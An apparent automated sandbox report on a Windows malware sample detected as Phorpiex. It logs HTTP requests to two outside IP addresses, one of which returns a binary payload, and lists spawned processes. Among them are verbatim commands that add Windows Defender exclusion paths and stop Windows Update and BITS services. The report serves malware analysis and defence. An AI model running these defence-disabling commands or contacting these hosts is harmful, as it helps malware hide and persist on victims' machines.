Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:28:15.729418993 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:28:16.804843903 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:16 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 26, 2024 07:28:18.951001883 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:28:19.244369984 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:19 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 26, 2024 07:28:21.412683010 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:28:21.708709002 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:21 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 26, 2024 07:28:23.748106956 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:28:24.042301893 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:23 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 26, 2024 07:28:26.121047974 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:28:26.416441917 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:26 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	50005	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:28:29.820270061 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:28:30.988163948 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:30 GMT Content-Type: application/octet-stream Content-Length: 110600 Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT Connection: keep-alive ETag: "66f3a94a-1b008" Accept-Ranges: bytes Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED] Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF\|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/\|"bWRoj(\|A,>?1;>"&;ucy[t`w #cdyysGx_ChI]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!nWG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 26, 2024 07:28:30.988200903 CEST	1236	IN	Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3 Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)\|Rai>&y+eu B
Oct 26, 2024 07:28:30.988217115 CEST	1236	IN	Data Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18 Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?\|6 : 3+`Se0L#}tK1(*ss\|@a$@bWEgU4
Oct 26, 2024 07:28:30.988234043 CEST	1236	IN	Data Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50 Data Ascii: Rx7U;4>^cCuqX>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA\|
Oct 26, 2024 07:28:30.988249063 CEST	1236	IN	Data Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3 Data Ascii: -]]XT?"'l2W)C:PAvR8HtY)s^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
Oct 26, 2024 07:28:30.988265038 CEST	1060	IN	Data Raw: 76 f8 eb 35 9a 49 f5 5f dc d3 37 59 0a e9 b8 e1 06 d3 e6 66 4b 04 7f 7b ee 03 3f 6a 27 e1 61 5e 8a b2 45 ed 6d b7 a8 9d 86 11 01 0f ff 78 01 fe 0d 80 ed c8 50 40 0b 73 80 eb b9 26 83 c3 d3 d3 ac 38 79 5a 41 ae 8b 77 07 a3 08 0e d9 8d 46 32 48 d1 Data Ascii: v5I_7YfK{?j'a^EmxP@s&8yZAwF2HPN.Tz=p7g8Zc4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=Yd
Oct 26, 2024 07:28:30.988284111 CEST	1236	IN	Data Raw: 18 e9 fa d0 90 1c bb a0 3f 37 06 f9 df 01 49 ce 19 58 a4 8e c3 69 68 1c 19 03 32 25 45 f7 a1 b0 d3 2b 83 68 4a 20 3f 4f 8e f6 37 4f 97 c2 11 f9 07 00 95 eb 48 d7 61 59 ae 4b 8e 79 b8 98 b5 1b a9 e5 4c 2e 24 4c 44 78 c4 1f 3d 03 bc 3e c9 d8 2e 67 Data Ascii: ?7IXih2%E+hJ ?O7OHaYKyL.$LDx=>.gAiwVjFp7s ;emO+"/;B`\K%G}=B,S%hQB94Q@KYRE6uPb^&Q.u
Oct 26, 2024 07:28:30.988300085 CEST	1236	IN	Data Raw: fc 26 fb 9e 43 0d 1c 90 b5 27 8d 99 84 ac c8 58 65 5e 0f ef 58 0d 06 2e b5 11 99 74 14 a2 d9 e1 7e 3e a0 17 80 2c f4 a5 6c 6d 68 50 41 03 7e 46 d6 d1 45 95 13 ea bc b1 b8 8f a5 c1 77 4f be 55 7b 7c 69 b5 1a d9 17 a2 d9 31 0e 4d 8a 8c 6e 4d c4 58 Data Ascii: &C'Xe^X.t~>,lmhPA~FEwOU{\|i1MnMXf{KE&.@0/:asZ>S+<h:!\|(0+u'MY&{iD^E-F{E~*\}GIQM%x+$v(j0F8>
Oct 26, 2024 07:28:30.988315105 CEST	1236	IN	Data Raw: 7e 7b 28 3e cf 15 da db 69 d0 5d 44 35 6e ef bb 36 94 45 56 e7 0c 6c d0 ff 80 8e 3b e2 37 56 11 74 96 4f 6c 91 12 5b f6 a0 d1 b6 e0 a2 9c c3 d3 c2 ee 0a c7 e7 63 da 98 43 1e 0d 53 32 1c 72 29 3b fd e5 0c 2d 3e 79 9d ac 78 c5 ce 87 52 43 c9 af c3 Data Ascii: ~{(>i]D5n6EVl;7VtOl[cCS2r);->yxRC"f>+7&;Gp$nL`N#HmlPT-\|BZB8o_KzOrDLZxe\|.A"]Hg-g9$SNg+#>r Z
Oct 26, 2024 07:28:30.988331079 CEST	1236	IN	Data Raw: f3 26 91 64 27 43 d9 99 f7 28 21 0f 13 c0 53 22 45 1f 59 a8 44 fe 58 f6 cd a1 e9 57 81 ea f0 60 ff 49 4e cb df fc 0e 36 5a 2d b4 81 43 02 b8 ac 25 a6 22 9e 1b 86 11 5a 8c 12 74 31 23 98 3d 44 26 35 20 52 0d b2 8d bd 87 b1 ee e1 ae a7 16 78 57 e9 Data Ascii: &d'C(!S"EYDXW`IN6Z-C%"Zt1#=D&5 RxW=_yoY`2j"!UBMVGP%8x53=[(CMv~pgg'6&rJ+)a=bx<ogN^:h#crdjKh#(]
Oct 26, 2024 07:28:30.993861914 CEST	1236	IN	Data Raw: d4 79 5a 94 88 4a a8 ce d1 a8 63 58 77 b9 12 bc c7 1b 78 0d 92 06 95 21 a6 11 1c 51 a3 15 48 f4 55 ac 3b 5c 99 da b6 94 cf af 1a 6e e6 95 cc a4 5d 17 88 90 bd ac 9c b0 a5 d8 76 b3 42 6a 29 da d0 1c 32 b0 92 88 8a d7 1f 43 44 ca b7 ef 64 1e 41 81 Data Ascii: yZJcXwx!QHU;\n]vBj)2CDdA E0If^!w(#:owZO8^_1/@FNf?_XijoziRglJ}~M{KcgE/SMO@4m`M#W$>

Target ID:	1
Start time:	01:26:23
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\T52Z708x2p.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\T52Z708x2p.exe"
Imagebase:	0x140000000
File size:	633'176 bytes
MD5 hash:	CD3237B1E648D31B8761196B6C64DA8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:26:23
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:26:25
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\70AF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\70AF.exe"
Imagebase:	0xaf0000
File size:	9'728 bytes
MD5 hash:	8D8E6C7952A9DC7C0C73911C4DBC5518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:26:31
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1706633239.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\1706633239.exe
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\1706633239.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:26:34
Start date:	26/10/2024
Path:	C:\Windows\sysppvrdnvs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysppvrdnvs.exe
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
Antivirus matches:	Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase:	0x880000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop UsoSvc
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:26:38
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0xbb0000
File size:	61'440 bytes
